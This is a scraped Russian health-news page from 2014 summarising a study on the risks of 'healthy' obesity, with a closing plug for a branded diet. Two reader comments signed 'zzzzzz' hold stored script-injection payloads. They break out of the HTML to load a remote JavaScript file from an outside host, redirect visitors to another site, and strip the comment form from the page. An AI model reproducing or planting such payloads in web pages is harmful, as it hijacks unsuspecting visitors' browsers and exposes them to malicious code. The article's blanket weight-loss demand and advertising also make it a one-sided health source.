Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Может ли ожирение быть зд...  >>  Может ли ожирение быть здоровым?
 
Обратная связь
 

Может ли ожирение быть здоровым?

Размер шрифта
14 апреля 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Порой от полного человека можно услышать пассажи из разряда: «Какой лишний вес? Я чувствую себя отлично, зачем мне худеть?» Однако американские ученые доказали, что даже совершенно бессимптомное ожирение значительно повышает риск развития диабета и ишемической болезни сердца.

Может ли ожирение быть здоровым?

Авторы обнаружили статистические данные, свидетельствующие в пользу того, при ожирении практически невозможно избежать развитие опасных осложнений, к коим можно отнести артериальную гипертензию, повышенный уровень сахара, инсулинорезистентность и снижение концентрации липопротеинов высокой плотности (ЛПВП; под этим сложным термином скрывается особая, полезная форма холестерина).

«К сожалению, полученные нами результаты указывают на то, что бессимптомное, метаболически инертное ожирение вовсе не является безобидным доброкачественным заболеванием», – рассказывает доктор Карлос Лоренцо, научный сотрудник одного из подразделений Техасского университета (город Сан Антонио, штат Техас, США). «Да, сейчас вы можете чувствовать себя замечательно, но с годами кардиоваскулярный и эндокринологический риски вас неизбежно настигнут.

Ученые проанализировали данные крупного эпидемиологического исследования (под названием San Antonio Heart Study). Авторов интересовала инцидентность (читай – встречаемость) сахарного диабета и ишемической болезни сердца. Период наблюдения за пациентами в рамках исследования составил в среднем 6-10 лет.

Для оценки метаболического здоровья авторы опирались на ряд лабораторных показателей, в числе которых: артериальное давление, липидный профиль и уровень сахара крови, степень инсулинорезистентности и показатели ЛПВП. Пациент считался метаболически здоровым в том случае, если максимум один показатель из этого перечня переступал границы нормы.

Оказалось, что риск развития диабета находится в прямой корреляционной зависимости с индексом массы тела (ИМТ). Конечно, при наличии множества лабораторных отклонений риск повышался и для худых людей. Аналогичная закономерность выявилась и для ишемической болезни сердца.

«Наша работа указывает на необходимость тщательного мониторинга сахарного диабета и ИБС у пациентов с ожирением, вне зависимости от наличия или отсутствия у них лабораторных отклонений и симптомов. И напротив, нормальный вес не должен снижать бдительность лечащего врача, если в биохимичском анализе крови бардак», – говорит доктор Лоренцо. «Недооценка риска в данном случае чревата очень опасными последствиями».

Так что не нужно оправдываться хорошим самочувствием и хорошими анализами. У вас лишний вес? Вам НУЖНО похудеть, без вариантов. «Диета Елены Малышевой» вам в этом поможет.

Результаты данной научной работы были опубликованы в одном из официальных изданий американского эндокринологического сообщества – Journal of Clinical Endocrinology & Metabolism.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:42

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:40

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
В новый год – с новым весом!   Сколько надо сбросить, чтобы не заболеть раком! Ответ в конце статьи!   Как воспитывать ребенка, чтобы он не был толстым?   Старт нового сезона проекта «Сбрось лишнее»  
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 05 июля 2013Вы не виноваты в своем лишнем весе! Еда всего лишь одна из причин ожирения! Какая же главная?
 
31 мая 2013От инфаркта не убежать, но можно уйти! Новые данные говорят о том, что ходьба также эффективна, как бег, в борьбе с лишним весом! 21 мая 2013Когда я ем – я глух и нем! Ученые доказали, что это поможет похудеть!
 

Слайдшоу

1
Как похудеть, ничего не делая
Как натренировать волю и похудеть?
Еда, которая заставляет вас ЕСТЬ

Тесты

1
Есть ли у вас избыточный вес?
Готовы ли вы сбросить лишнее?
Будет ли у вас инфаркт?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.